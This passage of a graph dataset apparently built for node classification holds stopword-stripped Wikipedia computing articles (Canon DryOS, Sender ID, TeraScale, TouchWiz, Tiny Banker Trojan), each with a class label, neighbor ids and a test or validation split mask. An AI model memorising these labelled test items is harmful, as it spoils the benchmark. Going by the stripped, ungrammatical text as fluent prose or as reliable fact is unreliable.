digic dv 6 implementation capable 4k 60fps digic board contains x86 compatible processor nec v30 emulation running datalight rom-dos s1is running vxworks two chips image processor motorola 68hc12 digic ii digic iii asics contain embedded 32-bit processors based arm instruction set around 2007 canon point-and-shoot cameras ran vxworks-based operating system recent cameras based dryos operating system developed in-house canon free software canon hack development kit chdk project started andrey gratchev successfully enhanced many canon powershot cameras without replacing stock firmware allows programmatic control many canon compact cameras enabling users add features including games scripts written ubasic lua features include shooting raw usb-cable remote shutter-release synchronized shooting multiple cameras motion-detection triggered photography customizable high-speed continuous burst tv av iso focus bracketing increasing depth field 1 gig video-size limit removed earlier cameras shutter aperture iso overrides shutter speeds 64 1/10,000 higher chdk project augment extend firmware necessary obtain copies cameras original firmware cases done via pure software method others rely method using blinking led camera optical serial port transmit firmware host computer however install precompiled firmware powershot camera necessary download correct binary copy sd memory card sd card set lock boot flag enabled camera turned camera autoboot binary file card chdk loaded camera ram card unlocked removed camera start original canon firmware chdk mask lock sd card camera still write however alternatively chdk loaded manually canon menu 400plus free firmware add-on offers additional functionality canon 400d non-destructive non-permanent way spy lantern surveillance camera commercial project based powershot chdk open script magic lantern firmware add-on written canon 5d mark ii trammell hudson 2009 ported 550d/t2i/kiss x4 1.0.8 july 2010 author starting september 2010 a1ex chdk forum people ported add-on 550d/t2i 1.0.9 60d 500d/t1i/kiss x3 600d/t3i/kiss x5 1.0.1 50d also runs 7d firmware released gnu general public license originally developed dslr filmmaking feature base expanded include tools useful still photography well current features include planned future features include clean hdmi output anamorphic preview custom curves installing magic lantern replace stock canon firmware modify rom rather runs alongside easy remove carries little risk canon made official statements regarding add-on firmware either subject warranty features",
    "neighbors": [
      4160,
      2241,
      7041,
      8898,
      4777,
      9964,
      7983,
      2843,
      2844
    ],
    "mask": "Test"
  },
  {
    "node_id": 2844,
    "label": 2,
    "text": "DRYOS:dryos dryos real-time operating system made canon used latest digital cameras camcorders since late 2007 digic-based cameras shipped using dryos replaces vxworks wind river systems used digic2 digic ii digic3 digic iii cameras dryos existed use canon hardware digital video cameras high-end webcams dryos 16 kilobytes kernel module core currently compatible 10 cpu types provides simulation-based development environment debugging canon also developed usb- middleware-compatible device driver file systems network devices like video server dryos aims compatible µitron 4.0 posix following cameras known run dryos",
    "neighbors": [
      2843,
      9964,
      9366
    ],
    "mask": "Test"
  },
  {
    "node_id": 2845,
    "label": 1,
    "text": "Bold_for_Delphi:bold delphi bold delphi advanced object relational mapper orm application framework written delphi designed significantly increase developer productivity providing following facilities application uses bold model created attributes links methods interface generated model application use application evolves model may need changed changes inteface generated well db-script sql code change database structure existing data database methods code preserved programmer make advanced use database without touching sql code good tutorial found bold founded boldsoft company stockholm framework sale borland bought boldsoft put hold discussions release code open source borland copyrights long time currently embarcadero legal rights framework bold still active developed attracs company eco follower bold delphi available .net framework bold delphi 2006",
    "neighbors": [
      3080,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 2846,
    "label": 3,
    "text": "Tulip_System-1:tulip system-1 tulip system 16-bit personal computer based intel 8086 made tulip computers formerly import company exidy sorcerer called compudata systems 6845-based video display controller could display 80×24 text 8 different fonts supporting different languages including videotex based font 2×3 pseudo graphic symbols displaying 160×72 pixel graphics text mode video display generator could also display graphics 384×288 768×288 color 768×576 monochrome pixel resolution using built-in nec 7220 video display coprocessor hardware supported drawing functions advanced set bit-block transfers could line generating arc circle ellipse ellipse arc filled arc filled circle filled ellipse filled elliptical arc many varied commands memory could upgraded units 128 kb 896 kb much 640 kb original pc included sasi hard disk interface predecessor scsi-standard optionally delivered 5 mb 10 mb hard disk floppy disk size 400 kb 10 sectors instead 8 9 ibm pc 800kb 80 tracks ran 8 mhz almost twice speed ibm pc xt launched months earlier july 1983 possibility use 8087 coprocessor math increased speed 200 kflops near mainframe data time initially using cp/m-86 quickly switched using generic ms-dos 2.00 rudimentary ibm-bios-emulator allowed user use wordstar ibm-pc software compudata b.v. shipped wordstar software adopted software computer programming support compudata b.v. ms-basic ms-pascal ms-fortran private base tex turbo pascal ported tulip system 1",
    "neighbors": [
      9363,
      9166,
      6415
    ],
    "mask": "None"
  },
  {
    "node_id": 2847,
    "label": 3,
    "text": "Machine_Check_Architecture:machine check architecture computing machine check architecture mca intel mechanism cpu reports hardware errors operating system intel pentium 4 intel xeon p6 family processors well itanium architecture implement machine check architecture provides mechanism detecting reporting hardware machine errors system bus errors ecc errors parity errors cache errors translation lookaside buffer errors consists set model-specific registers msrs used set machine checking additional banks msrs used recording errors detected",
    "neighbors": [
      8233,
      6924,
      4237,
      8590,
      7983,
      10734,
      7508,
      10039
    ],
    "mask": "Test"
  },
  {
    "node_id": 2848,
    "label": 4,
    "text": "Sender_ID:sender id sender id anti-spoofing proposal former marid ietf working group tried join sender policy framework spf caller id sender id defined primarily experimental rfc 4406 additional parts rfc 4405 rfc 4407 rfc 4408 sender id heavily based spf additions differences discussed sender id tries improve spf spf verify header addresses one indicate claimed sending party one header addresses typically displayed user may used reply emails header addresses different address spf tries verify spf verifies mail address also called envelope sender however many similar email header fields contain sending party information therefore sender id defines rfc 4407 purported responsible address pra well set heuristic rules establish address many typical headers email syntactically sender id almost identical spf except codice_1 replaced one syntactical difference sender id offers feature positional modifiers supported spf practice far positional modifier specified sender id implementation practice pra scheme usually offers protection email legitimate offering real protection case spam phishing pra legitimate email either familiar header field case mailing lists sender header field case phishing spam however pra may based resent-* header fields often displayed user effective anti-phishing tool mua mail user agent mail client need modified display either pra sender id return-path header field spf pra tries counter problem phishing spf mfrom tries counter problem spam bounces auto-replies forged return-paths two different problems two different proposed solutions pra disadvantage forwarders mailing lists support modifying mail header e.g insert codice_6 codice_7 latter violates rfc 2822 incompatible rfc 822 spf mailing lists continue work forwarders wishing support spf need modify smtp mail rcpt mail new concept original rfc 821 smtp forwarders always added host name reverse path mail problematic point core sender id specification recommendation interpret codice_1 policies like codice_3 instead codice_2 never intended published spf drafts since 2003 unknown large number codice_1 policies evaluation pra could cause bogus results many cases pra mfrom different problem basis appeal internet architecture board iab response another prior appeal iesg already noted sender id advance ietf standards track without addressing incompatibility must rfc 2822 sender id proposal subject controversy regarding intellectual property licensing issues microsoft holds patents key parts sender id used license patents terms compatible gnu general public license considered problematic free software implementations general october 23 2006 microsoft placed patents open specification promise compatible free open source licenses recent version gpl license version 3.x",
    "neighbors": [
      1125,
      5254,
      744,
      8202,
      8332,
      5421,
      9588,
      5082,
      9532
    ],
    "mask": "Test"
  },
  {
    "node_id": 2849,
    "label": 9,
    "text": "Larceny_(Scheme_implementation):larceny scheme implementation larceny implementation scheme programming language built around twobit optimizing compiler larceny offers several back-ends able target native x86 armv7 code petit larceny also available emits c source code compiled native code ordinary c compiler older versions 0.98 included support sparc architecture larceny microsoft common language runtime via common larceny larceny supports major scheme standards rrs ieee/ansi rrs rrs larceny software open source available online",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      5751,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      1952,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      7983,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      8262,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      7805,
      6502,
      8293,
      2666,
      3051,
      5612,
      9964,
      5360,
      5361,
      8435,
      3446,
      1399,
      6906,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 2850,
    "label": 3,
    "text": "TeraScale_(microarchitecture):terascale microarchitecture terascale codename family graphics processing unit microarchitectures developed ati technologies/amd second microarchitecture implementing unified shader model following xenos terascale replaced old fixed-pipeline microarchitectures competed directly nvidia first unified shader microarchitecture named tesla terascale used hd 2000 manufactured 80 nm 65 nm hd 3000 manufactured 65 nm 55 nm hd 4000 manufactured 55 nm 40 nm hd 5000 hd 6000 manufactured 40 nm terascale also used amd accelerated processing units code-named brazos llano trinity richland terascale even found succeeding graphics cards brands terascale vliw simd architecture tesla risc simd architecture similar terascale successor graphics core next terascale implements hyperz llvm code generator i.e compiler back-end available terascale seems missing llvm matrix e.g mesa 3d makes use siggraph 08 december 2008 amd employee mike houston described terascale microarchitecture fosdem09 matthias hopf amds technology partner suse linux presented slide regarding programming open-source driver r600 previous gpu architectures implemented fixed-pipelines i.e distinct shader processors type shader terascale leverages many flexible shader processors scheduled process variety shader types thereby significantly increasing gpu throughput dependent application instruction mix noted r600 core processes vertex geometry pixel shaders outlined direct3d 10.0 specification shader model 4.0 addition full opengl 3.0 support new unified shader functionality based upon long instruction word vliw architecture core executes operations parallel shader cluster organized 5 stream processing units stream processing unit retire finished single precision floating point mad add mul instruction per clock dot product dp special cased combining alus integer add 5th unit complex additionally handle special transcendental functions sine cosine shader cluster execute 6 instructions per clock cycle peak consisting 5 shading instructions plus 1 branch notably vliw architecture brings classic challenges inherent vliw designs namely maintaining optimal instruction flow additionally chip co-issue instructions one dependent results performance gpu highly dependent mixture instructions used application well real-time compiler driver organize said instructions r600 core includes 64 shader clusters rv610 rv630 cores 8 24 shader clusters respectively terascale includes multiple units capable carrying tessellation similar programmable units xenos gpu used xbox 360 tessellation officially specified major api starting directx 11 opengl 4 terascale 1 2 based gpu hd 2000 3000 4000 series conformant direct3d 10 opengl 3.3 terascale 3 based gpu starting radeon hd 5000 series first conform direct3d 11 opengl 4.0 supporting tesselation feature de facto terascale tessellator units allow developers take simple polygon mesh subdivide using curved surface evaluation function different tessellation forms bézier surfaces n-patches b-splines nurbs also subdivision techniques surface usually includes displacement map kind texture essentially allows simple low-polygon model increased dramatically polygon density real-time small impact performance scott wasson tech report noted amd demo resulting model dense millions polygons appeared solid terascale tessellator reminiscent ati truform brand name early hardware tessellation unit used initially radeon 8500 tessellation hardware part opengl 3.3 direct3d 10.0 requirements competitors geforce 8 series lacked similar hardware microsoft added tessellation feature part directx 10.1 future plans ati truform received little attention software developers games madden nfl 2004 serious sam unreal tournament 2003 2004 unofficially morrowind support ati tesselation technology included slow adaptation fact feature shared nvidia gpus since implemented competing tessellation solution using quintic-rt patches achieved even less support major game developers since xbox 360 gpu based ati architecture microsoft saw hardware-accelerated surface tessellation major gpu feature couple years later tesselation feature became mandatory release directx 11 2009 gcn geometric processor amd acquired ati gpu business current solution carrying tessellation using gpu although r600 significant departure previous designs still shares many features predecessor radeon r520 ultra-threaded dispatch processor major architectural component r600 core radeon x1000 gpus processor manages large number in-flight threads three distinct types vertex geometry pixel shaders switches amongst needed large number threads managed simultaneously possible reorganize thread order optimally utilize shaders words dispatch processor evaluates goes parts r600 attempts keep processing efficiency high possible lower levels management well simd array 80 stream processors sequencer arbiter arbiter decides thread process next sequencer attempts reorder instructions best possible performance within thread texturing final output aboard r600 core similar also distinct r580 r600 equipped 4 texture units decoupled independent shader core like r520 r580 gpus render output units rops radeon hd 2000 series performs task multisample anti-aliasing msaa programmable sample grids maximum 8 sample points instead using pixel shaders radeon x1000 series also new capability filter fp16 textures popular hdr lighting full-speed rop also perform trilinear anisotropic filtering texture formats r600 totals 16 pixels per clock fp16 textures higher precision fp32 textures filter half-speed 8 pixels per clock anti-aliasing capabilities robust r600 r520 series addition ability perform 8× msaa 6× msaa r300 r580 r600 new custom filter anti-aliasing cfaa mode cfaa refers implementation non-box filters look pixels around particular pixel processed order calculate final color anti-alias image cfaa performed shader instead rops brings greatly enhanced programmability filters customized may also bring potential performance issues use shader resources launch r600 cfaa utilizes wide narrow tent filters samples outside pixel processed weighted linearly based upon distance centroid pixel linear function adjusted based wide narrow filter chosen memory controllers connected via internal bi-directional ring bus wrapped around processor radeon hd 2900 1,024-bit bi-directional ring bus 512-bit read 512-bit write 8 64-bit memory channels total bus width 512-bits 2900 xt radeon hd 3800 512-bit ring bus radeon hd 2600 hd 3600 256-bit ring bus radeon hd 2400 hd 3400 ring bus series saw half-generation update die shrink 55 nm variants rv670 rv635 rv620 variants support pci express 2.0 directx 10.1 shader model 4.1 features dedicated ati unified video decoder uvd models powerplay technology desktop video cards except radeon hd 3800 series variants supported 2 integrated displayport outputs supporting 24- 30-bit displays resolutions 2,560×1,600 output included 1 2 4 lanes per output data rate 2.7 gbit/s per lane ati claimed support directx 10.1 bring improved performance processing efficiency reduced rounding error 0.5 ulp compared average error 1.0 ulp tolerable error better image details quality global illumination technique used animated films improvements consumer gaming systems therefore giving realistic gaming experience see list chips pages terascale 2 vliw5 introduced radeon hd 5000 series gpus baptized evergreen hpg10 mark fowler presented evergreen stated e.g 5870 cypress 5770 juniper 5670 redwood support max resolution 6 times 2560×1600 pixels 5470 cedar supports 4 times 2560×1600 pixels important amd eyefinity multi-monitor support release cypress terascale graphics engine architecture upgraded twice number stream cores texture units rop units compared rv770 architecture stream cores largely unchanged adds support directx 11/directcompute 11 capabilities new instructions also similar rv770 four texture units tied 16 stream cores five processing elements making total 80 processing elements combination referred simd core unlike predecessor radeon r700 directx 11 mandates full developer control interpolation dedicated interpolators removed relying instead simd cores stream cores handle higher rounding precision fused multiply–add fma instruction single double precision increases precision multiply–add mad compliant ieee 754-2008 standard instruction sum absolute differences sad natively added processors instruction used greatly improve performance processes video encoding transcoding 3d engine simd core equipped 32 kib local data share 8 kib l1 cache simd cores share 64 kib global data share memory controller ties two quad rops one per 64-bit channel dedicated 512 kib l2 cache redwood one quad rop per 256-bit channel amd powerplay supported see terascale 3 vliw4 replaces previous 5-way vliw designs 4-way vliw design new design also incorporates additional tessellation unit improve direct3d 11 performance terascale 3 implemented radeon hd 6900-branded graphics cards also trinity richland apus chips baptized northern islands family amd powertune dynamic frequency scaling gpus introduced radeon hd 6900 december 15 2010 prone development ever since like couple reviews anandtech document hpg11 august 2011 amd employees michael mantor senior fellow architect mike houston fellow architect presented graphics core next microarchitecture succeeding terascale",
    "neighbors": [
      3586,
      9475,
      3204,
      10375,
      398,
      6818,
      9122,
      10658,
      9391,
      11183,
      6705,
      9400,
      6978,
      1480,
      11080,
      8523,
      9551,
      7122,
      9427,
      10966,
      344,
      10971,
      11485,
      5859,
      1510,
      876,
      11630,
      2935,
      11130,
      2943
    ],
    "mask": "Test"
  },
  {
    "node_id": 2851,
    "label": 1,
    "text": "Single_version_of_the_truth:single version truth computerized business management single version truth svot technical concept describing data warehousing ideal either single centralised database least distributed synchronised database stores organisation data consistent non-redundant form contrasts related concept single source truth ssot refers data storage principle always source particular piece information one place systems context message processing systems often realtime systems term also refers goal establishing single agreed sequence messages within database formed particular arbitrary sequencing records key concept data combined certain sequence truth may analyzed processed giving particular results although sequence arbitrary thus another correct equally arbitrary sequencing would ultimately provide different results analysis desirable agree sequence enshrined single version truth version considered truth conclusions drawn analysis database valid unarguable technical context database may duplicated backup environment ensure persistent record kept single version truth key point database created using external data source sequence trading messages stock exchange arbitrary selection made one possibility two equally valid representations input data henceforth decision sets stone one one version truth critics svot applied message sequencing argue concept scalable world moves towards systems spread many processing nodes effort involved negotiating single agreed-upon sequence becomes prohibitive pointed owen rubel api world talk 'the new api pattern svot always going service layer distributed architecture input/output meet also endpoint binding belongs allow modularization better abstraction i/o data across architecture avoid architectural cross cutting concern",
    "neighbors": [
      5595
    ],
    "mask": "None"
  },
  {
    "node_id": 2852,
    "label": 2,
    "text": "TouchWiz:touchwiz touchwiz samsung touchwiz user interface created designed developed samsung electronics partners featuring full touch user interface touchwiz available samsung devices sometimes incorrectly identified operating system touchwiz used internally samsung smartphones feature phones tablet computers available licensing external parties android version touchwiz also comes samsung-made app store galaxy apps first original edition touchwiz released 2008 1.0 version officially launched original samsung solstice 2009 latest version touchwiz touchwiz 6.0 samsung galaxy j1 mini prime touchwiz nature ux 5.0 samsung galaxy j3 2016 feature refined user interface compared previous versions found samsung older phones released prior galaxy s5 release status bar transparent home screen mode touchwiz nature ux 2.0 touchwiz nature ux 2.5 touchwiz 4.0 galaxy ii galaxy note later updated nature ux features added include panning tilt makes use accelerometer gyroscope phone detect motion touchwiz abandoned samsung late 2016 favor samsung experience touchwiz used samsung proprietary operating systems bada rex well phones based android operating system also present phones running tizen operating system touchwiz central issue apple v. samsung released 2010 support android froyo 2.1 – 2.2 version premiered samsung galaxy s. lite version touchwiz 3.0 reduced features used samsung galaxy proclaim second version touchwiz released 2011 support android gingerbread android honeycomb 2.3 3.2.6 galaxy ii first device preloaded touchwiz 4.0 version includes better hardware acceleration 3.0 well multiple touchscreen options involving multi-touch gestures using phone accelerometer one feature allows users place two fingers screen tilt device towards away zoom respectively panning touchwiz 4.0 allows users scroll home screens moving device side side third version touchwiz renamed touchwiz nature ux released 2012 supported android ice cream sandwich 4.0 galaxy iii galaxy star galaxy note 10.1 first devices preloaded version although lite version used beforehand samsung galaxy tab 2 7.0 touchwiz nature ux contains interactive elements previous version water ripple effect lock screen smart stay feature uses eye tracking technology determine user still watching screen complement touchwiz interface response apple siri version introduces voice samsung intelligent personal assistant version supports android jellybean 4.2.2 released 2013 samsung galaxy s4 first device use touchwiz nature ux 2.0 even eye tracking abilities introduced version smart scroll allows users scroll webpages tilting head downwards upwards respectively touchwiz nature ux 2.5 released 2013 support last updates android jellybean 4.3 4.4 first used galaxy note 3 galaxy note 10.1 2014 edition version completely supports samsung knox security solution well multi-user capabilities camera also improved update shutter lag reduced features like 360° panorama mode added update released 2014 support android kitkat first seen galaxy s5 galaxy note pro 12.2 home screen settings menu made user-friendly larger icons less clutter also icons context menus removed disabled options previously would visible unusable show budget devices samsung galaxy trend 2 lite galaxy j1 ace galaxy v plus feature reduced version touchwiz nature ux 3.0 called touchwiz essence ux adapted devices less 1 gb ram version ultra-power-saving mode drastically extends battery duration making screen grayscale restricting apps used turning features like wi-fi bluetooth slightly modified version touchwiz nature ux 3.0 released 2014 galaxy note 4 galaxy note edge galaxy a-series 2015 changes made minor aesthetic ones including overhaul cluttered settings menu inclusion quick setting shortcuts centralization lock screen clock however camera application stripped basic features nonetheless gaining af/ae lock version comes galaxy s5 supports android lollipop released 2015 update 4.0 eventually became available galaxy s5 note 3 note 4 lollipop-compatible devices less features version touchwiz continued design initially seen galaxy s5 slightly rounded icons also incorporated lollipop additions changes making notification drop-down menu merely overlay instead full-screen drawer touchwiz nature ux 4.0 also included visual overhaul whole system changing black background system apps white theme similar touchwiz ux 3.5 seen note 4 series black theme place since original galaxy reduced battery consumption samsung mainly uses amoled display technology changed patent licensing deal google required touchwiz interface follow design stock android closely touchwiz 5.0 samsung reverted earlier simpler naming system without nature ux infix perhaps reflect aesthetic changes version released 2015 primarily samsung galaxy s6 supports later updates android lollipop 5.0.2 5.1.1 update cleaned user interface reduced number duplicate functions used brighter simpler colours new version touchwiz 5.0 released september 2015 galaxy note 5 s6 edge+ new version features updated iconography stock apps featuring squircle icons instead freeform version touchwiz began initial beta testing android marshmallow galaxy s6 december 2015 users signed beta program became formally available february 2016 features redesigned notification drop-down colour overhaul replacing original blue green hue white version also removed weather centring enlarging clock lock screen well bringing back ability customize shortcuts lock screen icons slightly modified flatter look removing shadows featured previously smart manager removed app moved settings option instead version samsung also added ability change display density setting although initially accessible third-party app setting hidden system update galaxy s7 s7 edge made official allowing users change display settings touchwiz 6.0 also includes google additions android doze app standby improve battery performance although samsung app optimization feature remains available thus meaning two separate app optimization settings one within smart manager app within battery usage screen tap quickly access intelligent personal assistant google permission control limit permissions granted particular application first released samsung galaxy note 7 android marshmallow grace ux named device codename eventually made way older devices including galaxy note 5 update galaxy s7 s7 edge official android nougat update grace ux features cleaner flatter look iconography extensive use white space touchwiz grace ux devices also benefit secure folder functionality enables users keep certain data even apps behind secure password addition countries languages absent previous versions android marshmallow earlier available release starting galaxy tab s3",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      5677,
      1083,
      1603,
      6212,
      69,
      2630,
      8262,
      4685,
      3664,
      8280,
      8285,
      2658,
      6266,
      11391,
      1670,
      5262,
      2707,
      10393,
      7835,
      673,
      8870,
      1191,
      7857,
      196,
      8907,
      2259,
      8413,
      9949,
      11487,
      1255,
      8940,
      6391,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      2399,
      10080,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      2001,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2853,
    "label": 2,
    "text": "Symphony_OS:symphony os symphony os symphonyone symphony linux live cd linux-based operating system developed ryan p quinn jason spisak alexander drummond distribution dormant 29 june 2011 new build released first symphony os based knoppix since may 2006 release longer based knoppix rather debian unstable features functional hard drive installer symphony os 2007 preview based ubuntu 7.04 symphonyone released april 1 2008 release version 2008.1 based ubuntu 7.10 primary difference symphony os distributions addition mezzo desktop environment environment like aspects symphony designed eye towards extreme simplicity usability example wlan-networks work automatically user action symphony also includes mozilla-driven application environment called orchestra symphony os uses custom packaging system utilizing *.sym package format simple gui user may install application symphony library without dealing dependency hell symphony debian-based also supports debian package format orchestra rapid application development environment written symphony os allows programs composed html cgi-style perl run local gui applications orchestra made two main parts lightweight localhost-only http server written perl slimmed mozilla renderer mozilla used base rendering orchestra applications utilize following technologies mezzo desktop environment created ryan quinn based designs jason spisak added symphony os aims pose new way presenting data user mezzo disposes standard concepts like desktop folder nested menu systems instead presents needed information directly user via main desktop four desk targets tasks files related system programs files trash developers claim makes desktop easier use new desktop environment called conductor development symphony os come dormant stage working new release scheduled time 2013 release built ubuntu 13.04 features redone version mezzo making os comparable design android operating system tablet operating systems creator behind symphony os mentioned distributions website symphonyos.com stated plans creation app-market use advanced packaging tool apt-url option official release date given",
    "neighbors": [
      8837,
      3462,
      8582,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      2853,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      2485,
      4790,
      823,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      225,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      2417,
      8177,
      5363,
      9074,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 2854,
    "label": 2,
    "text": "Microsoft_Customer_Care_Framework:microsoft customer care framework microsoft customer care framework ccf desktop-based framework used address issues faced service providers caused multiple line business lob systems interacting customers discontinued though many core functions moved add-in microsoft dynamics crm product customer care framework provided core set functions customer support avenues including voice call via call center agents internet portals framework used microsoft server products including biztalk server sharepoint ccf required use microsoft sql server microsoft iis server side uses provide base core set web services ccf targeted medium large enterprises ccf originally developed large call center requirements telecommunication industry ccf different products microsoft 'out box solution requires development configuration build working customer solution framework allows soa methodology development server agent desktop side mandatory non-soa development done normally case primary user interface ccf agent desktop desktop-based user interface ui presents data aggregated various line business lob oss/bss application front ends presents unified view ccf include agent desktop application rather samples including source code provided part framework aif manages loading applications integration event brokering use adapters see hat applications custom integrations account technology hosted application well business processing hat allows separation business rules method used integrate application hat uses microsoft windows workflow foundation wf manage business rules data driven adapters ddas manage application directly bindings written xml connect two ccf 2009 sp1 ships 3 ddas win32 web java jdk 1.6 ddas customized extended additional application types needed version customer care framework ccf 2009 sp1 qfe break upgrading .net framework 3.5 sp1 microsoft composite ui application block used build composite applications within ccf number products similar ccf offered companies well",
    "neighbors": [
      10243,
      4107,
      10769,
      9234,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      2145,
      1656,
      5754,
      9340,
      5761,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      11030,
      5401,
      5913,
      11546,
      4384,
      11559,
      10024,
      10026,
      10029,
      7983,
      11570,
      5952,
      1348,
      844,
      4439,
      10079,
      11616,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      11683,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2855,
    "label": 7,
    "text": "Cloud_Computing_Manifesto:cloud computing manifesto cloud computing manifesto manifesto containing public declaration principles intentions cloud computing providers vendors annotated call action worldwide cloud community dedicated belief cloud open follows earlier development cloud computing bill rights addresses similar issues users point view document developed way open community consensus process response request microsoft 'manifesto created inception open mechanism like wiki public debate comment available creative commons license accordingly hosted mediawiki wiki licensed cc-by-sa 3.0 license original controversial version document called open cloud manifesto sharply criticised microsoft spoke vehemently developed secret shadowy group industry companies raising questions conflicts interest resulting extensive media coverage following days pre-announcement commits official publication document 30 march 2009 spite calls publish earlier time identities signatories several largest technology companies organizations led ibm along omg believed also include cisco hp sun microsystems said revealed amazon google microsoft salesforce.com among known rejected document declining signatories document leaked geva perry blog post 27 march 2009 confirmed authentic shortly afterwards authors public private documents agreed work bring together best points effort open cloud manifesto version developed private secret consortium companies prematurely revealed microsoft senior director developer platform product management steve martin 26 march 2009 claim privately shown copy document warned secret told must signed 'as without modifications additional input point disputed reuven cohen originally believed document author commentators found ironic microsoft speak support open standards others felt criticism justified comparing long ugly war ws-i call open cloud standards later echoed brandon watson microsoft director cloud services ecosystem following principles defined document",
    "neighbors": [
      9665,
      4194,
      5384,
      10090,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 2856,
    "label": 3,
    "text": "Zemmix:zemmix zemmix trade mark brand name south korean electronics company daewoo electronics co. ltd. msx-based video game console brand brand name zemmix longer use name zemmix daewoo released series gaming consoles compatible msx home computer standards consoles production 1985 1995 consoles sold outside south korea consoles designed broadcast standard ntsc low high outputs connecting tv universal adapter connection mains 110/220 volts consoles also letter coming serial number letters indicated color combination console key follows example cpc 51w would white silver zemmix v see zemmix products korean software companies produced software zemmix gaming console zemmix software work msx/msx2/msx2+ computers",
    "neighbors": [
      1776,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2857,
    "label": 4,
    "text": "Tiny_Banker_Trojan:tiny banker trojan tiny banker trojan also called tinba malware program targets financial institution websites modified form older form viruses known banker trojans yet much smaller size powerful works establishing man-in-the-browser attacks network sniffing since discovery found infected two dozen major banking institutions united states including td bank chase hsbc wells fargo pnc bank america designed steal users sensitive data account login information banking codes tiny banker first discovered 2012 found infected thousands computers turkey discovered original source code malware leaked online began undergoing individual revisions making process detecting harder institutions highly modified version zeus trojan similar attack method obtain information tinba however found much smaller size smaller size makes malware difficult detect 20kb tinba much smaller known trojan reference average file size web site around 1,000kb difference infected web page clean one difficult anti-malware programs recognize tinba operates using packet sniffing method reading network traffic determine user navigates banking website malware launch one two different actions depending variation popular form tinba form grab webpage causing man-in-the-middle attack trojan uses form grabbing grab keystrokes encrypted https tinba sends keystrokes command control turn causes user information stolen second method tinba used allow user log webpage user malware use page information extract company logo site formatting create pop-up page informing user updates system requesting additional information social security numbers banking institutions inform users never ask information way defend types attacks tinba modified address defense begun asking users type information asked security questions user mother maiden name attempt attacker use information reset password later time tinba also injects system processes attempt convert host machine zombie unwilling member botnet order maintain connection botnet tinba coded four domains one goes loses communication trojan look one others immediately",
    "neighbors": [
      1024,
      8320,
      3843,
      5764,
      10756,
      10502,
      2187,
      5131,
      4240,
      11152,
      4863,
      4883,
      10003,
      278,
      535,
      1688,
      10132,
      3867,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      11175,
      8489,
      5547,
      11052,
      9518,
      9904,
      1970,
      9395,
      8886,
      1337,
      441,
      1979,
      4027,
      6588,
      10297,
      10875,
      2114,
      1608,
      3657,
      8779,
      2508,
      3789,
      4304,
      2815,
      6484,
      4054,
      8664,
      857,
      1882,
      4314,
      9435,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      5349,
      1254,
      10477,
      2542,
      3711,
      3956,
      9460,
      4344,
      9082,
      507,
      2175
    ],
    "mask": "Test"
  },
  {
    "node_id": 2858,
    "label": 0,
    "text": "Kneser–Ney_smoothing:kneser–ney smoothing kneser–ney smoothing method primarily used calculate probability distribution n -grams document based histories widely considered effective method smoothing due use absolute discounting subtracting fixed value probability lower order terms omit n -grams lower frequencies approach considered equally effective higher lower order n -grams method proposed 1994 paper reinhard kneser ute essen common example illustrates concept behind method frequency bigram san francisco appears several times training corpus frequency unigram francisco also high relying unigram frequency predict frequencies n -grams leads skewed results however kneser–ney smoothing corrects considering frequency unigram relation possible words preceding let formula_1 number occurrences word formula_2 followed word formula_3 corpus equation bigram probabilities follows formula_4 unigram probability formula_5 depends likely see word formula_6 unfamiliar context estimated number times appears word divided number distinct pairs consecutive words corpus formula_7 please note formula_8 proper distribution values defined way non-negative sum one parameter formula_9 constant denotes discount value subtracted count n-gram usually 0 1 value normalizing constant formula_10 calculated make sum conditional probabilities formula_11 formula_6 equal one observe provided formula_13 formula_6 occurs least context formula_15 corpus discount probability exactly constant amount formula_16 total discount depends linearly number unique words formula_6 occur formula_15 total discount budget spread formula_11 proportionally formula_5 values formula_5 sum one simply define formula_10 equal total discount formula_23 equation extended n-grams let formula_24 formula_25 words formula_6 formula_27 model uses concept absolute-discounting interpolation incorporates information higher lower order language models addition term lower order n-grams adds weight overall probability count higher order n-grams zero similarly weight lower order model decreases count n-gram non zero",
    "neighbors": [
      1044,
      3998,
      7599
    ],
    "mask": "Test"
  },
  {
    "node_id": 2859,
    "label": 4,
